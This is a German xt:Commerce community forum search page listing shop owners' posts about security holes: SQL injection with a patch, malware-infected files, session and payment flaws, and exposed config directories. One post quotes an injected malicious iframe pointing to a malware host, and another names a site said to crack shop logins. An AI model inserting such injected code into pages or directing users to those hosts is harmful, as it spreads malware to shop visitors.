Jump to content
xt:Commerce Community Forum

Search the Community

Showing results for tags 'sicherheitslücke'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • xt:Commerce - Professionelle eCommerce Shopsoftware
    • Fragen zur Software
    • xt:Commerce Plugins
    • xt:Commerce 4 Sprachen
    • xt:Commerce Online Handbuch
    • Häufige Fragen (FAQ)
    • Fragen zur Software (Pre Sale)
    • Anleitungen - Patches - Downloads
  • xt:Commerce Office - Shop & Warenwirtschaft
    • Allgemeine Fragen
  • xt:Commerce Allgemein
  • xt:Commerce 3 Shopsoftware Community Area (nur Lesen)
    • Allgemeine Diskussionen
    • Installation und Konfiguration
    • Shopbereich
    • Admininterface
    • Modul Entwicklung
    • Template System
    • xt:Commerce Schnittstellen ERP Systeme
    • PHP & MysQL Forum
    • HTML & CSS

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biografie


Wohnort


Interessen


Beruf

Found 14 results

  1. Hetzer hat mir wegen meines Shops eine Abusemail geschickt. Finde hier aber dazu nichts. Bin ich der einzige?
  2. Unser Provider hat gerade eine Mail von Heise weitergeleitet, ist also zimlich Frisch. Scheint hauptsächlich Shops der Version 3 zu betreffen. http://www.heise.de/security/meldung/Tausende-Online-Shops-auf-Basis-von-xt-Commerce-akut-bedroht-2065104.html
  3. Vielleicht gibt's ja einen Sicherheitspatch, den ich nicht gefunden habe, in neueren Shopversionen könnte diese Lücke auch schon längst geschlossen sein: Über eine Lücke in inc/xtc_db_error.inc.php kann ein Angreifer kompletten Lesezugriff auf die Datenbank bekommen wenn er popup_image.php per SQL-Injection angreift. In dokumentierten Fällen wurden damit Kundendaten (Name, Vorname, email, verschlüsseltes Passwort) gestohlen. Zum Glück waren keine Zahlungsinformationen wie Bankdaten oder Kreditkartendaten in der Datenbank. Das Loch lässt sich ganz einfach schließen indem man in der Datei im Verzeichnis inc "xtc_db_error.inc.php" folgende Zeile die('<font color="#000000"><b>' . $errno . ' - ' . $error . '<br /><br />' . $query . '<br /><br /><small><font color="#ff0000">[XT SQL Error]</font></small><br /><br /></b></font>');[/PHP]durch [PHP]die('<font color="#000000"><b>Database error</b></font>');[/PHP]ersetzt.
  4. Hallo, seit einigen Tagen ist doch eine kritische Sicherheitslücke für commerce:SEO und Gambio bekannt... Diese Lücke besteht schon seit xtCommerce bis 3.04 SP2.1 und wurde leider von den ganzen Forks mit übernommen. Gibt es hier auch Informationen darüber? Danke ans Team!!
  5. Wenn bilder nicht mehr geladen werden kann das der Grund sein: habe in den img ordner im media und unterordner überall .htaccess dateien gefunden mit folgendem inhalt: * links entfernt, enthalten virus.
  6. Hallo, Unser Shop auf Basis von v3.0.4 SP2.1 wird seit Tagen durch Malware Code verseucht. Es wird immer in verschiedene Index.htm Dateien Code in Form von:<iframe src="http://jquery4html.co.cc/rsslist/"> geschrieben. Wie kann es dazu kommen ?
  7. Vorab: Wenn ich falsch gepostet habe, sorry und natürlich VERSCHIEBEN! Mojn, folgender Fehler: Gestern hat ein Herr als Gast bestellt. Es wurden alle Felder von ihm ausgefüllt (Name, Adresse, Telefon, EMail, Geb.Dat). Die Bestellung kam bei uns auch an und war auch in Ordnung. Ca. 8 Std. später kam eine erneute Bestellung dieses Herren. Heute morgen fanden wir eine EMail, dass dieser Herr nur eine Bestellung getätigt hat. Wir hatten mittlerweile aber 3 Bestellungen von ihm! Eine überprüfung ergab nun folgendes: Nennen wir den Herrn Max Mustermann (Gast, kein Konto): Bestellung um ca. 13.50 h: (korrekte Bestellung) Kunde, Versandadresse, Rechnungsadresse alles Max Mustermann. So, nun gehts los: Um kurz nach 20.00 h kam eine weitere Bestellung: Kunde und Versandadresse Max Mustermann (auch alle anderen Daten waren von ihm), Rechnungsadresse war eine völlig andere (hab auch keine weiteren Daten über diesen Kunden, hat sich weder als Kunde noch als Gast angemeldet). Und als ob das nicht reicht, kam noch mal eine Bestellung um kurz von 23.00 h: Kunde wieder unser Max Mustermann, Rechnungsadresse und Versandadresse wieder ein anderer, jedoch auch hier keine weiteren Daten) Der Kunde Max Mustermann ist natürlich verärgert, weil er über alle Bestellungen per E-Mail natürlich benachrichtigt wurde (ging wohl alles über seine Gastkonto)! Hat jemand eine Ahnung, was das sein könnte? Wir sind etwas verzweifelt! Danke fürs Mitgrübeln Sirius2010
  8. Hallo, bei der Bestellung eines digitalen Artikel mit dem Wert Null in der Artikelanzahl, kann man nach dem Kauf den Artikel downloaden ohne Ihn zu bezahlen. Kennt Ihr den Fehler? Hauwi
  9. Hallo zusammen, ich musste heute feststellen, dass die XT-Commerce Version - XT-C v1.0 Beta2, die ich damals vor Jahren installiert hatte, auf jeden Fall eine Sicherheitslücke hat, denn ohne etwas gemacht zu haben, wurde das Bewertungssystem installiert/aktiviert. Und hier steht jetzt nur Spam drin! Da diese Version wirklich die erste und dann auch noch eine Beta ist, möchte ich auf die 3er Version updaten. Wie kann ich die Produkte/Kunden/Bestellungen exportieren und in der 3er Version einpflegen ? Viele Grüße andré
  10. Hallo, ich betreibe demnächst unter shop.5w-verlag.de einen Shop. Was ich allerdings komisch finde, ist, dass ich mit dem vor- und zurück Button im Browser (hier Firefox) Bestellungen auslösen kann, ohne dass der Paypal-Prozess wirklich vonstatten ging. Wenn ich als vond er Paypal Seiet auf meine zurück gehe und nochmals versuche die Bestellung abzuschliessen, löst xtc die Bestellung aus. Ist das eine Sicherheitslücke oder wie kann man das vermeiden? Bin für jede Hilfe dankbar. Viele Grüße Martin Rost
  11. hallo forumsuser, bin vor gut zwei wochen gehackt worden. habe darauf hin recherchiert und folgendes forum gefunden... http://apfelz-shop.info/blackboard/ die versuchen die zugangsdaten zum shop zu knacken und ändern dann im adminbereich so einiges... z.b. kontodaten.... vielleicht sollte man versuchen dem admin die rechte zu geben, sich nicht mit einer mailadresse anmelden zu müssen.... also ich hoffe euch bleibt das erspart. schuele2:confused:
  12. Hallo, habe per zufall folgendes festgestellt: Ist ein Kunde eingeloggt und schaut er sich ein gewisses Produkt an (Produktdatei) und schliest dann einfach das Fenster ohne sich auszuloggen ist folgendes möglich: Sucht man nun z.b. über google genau nach diesem Produkt, so das man genau auf diese Produktdatei stößt, ist man mit dem Benutzer eingeloggt der sich als letztes dieses Produkt angeschaut (wenn er eingeloggt war und sich nicht ausgeloggt hat.) Wo stellt man den auto log out ein, so das man nach einer gewissen zeit automatisch ausgeloggt wird ? Sorry, aber ich bin kein Experte vlt. mag es daher auch verwirrend rüber kommen.. Bitte einach um en paar Kommentare /Erfahrungen L
  13. Hilfe wer kann mir helfen ? Meine robots.txt ist original 3.0.4. sp 2.1.Dort steht drinnen Disallow: includes/ Nun wenn ich diese versuche einzugeben, kommt man zu den Unterordner includes auf dem Server und dort werden alle vorhandenen Dateien im Browser angezeigt. Ist es nicht hier möglich die Dateien zu manipulieren bzw. downzuloaden und einzusehen ? Dort steht auch die configure.php drinnen und die confirgure.org.php. Wenn man diese mit irgendein Programm öffnen kann, dann kommt man ja an den Passwörtern dran :-(( Muss ich an den Einstellungen etwas ändern, damit man nicht mehr den ordner includes direkt aufrufen kann ? Bitte Erklärung verständlich für einen nicht Programmierer. Danke LG conny
  14. Hallo, ich habe zwei XT:C Shop im Einsatz. Heute ist mir aufgefallen, das wenn ich mich bei einem in den Adminbereich einwähle und dann den anderen XT:C Shop besuche, ich automatisch auch Zugriff auf den Adminbereich von dem zweit besuchten Shop habe. Ich verwende eine XT:C Anwendung für die beiden Shops, kann das eventuell daran liegen? Danke!
×
×
  • Create New...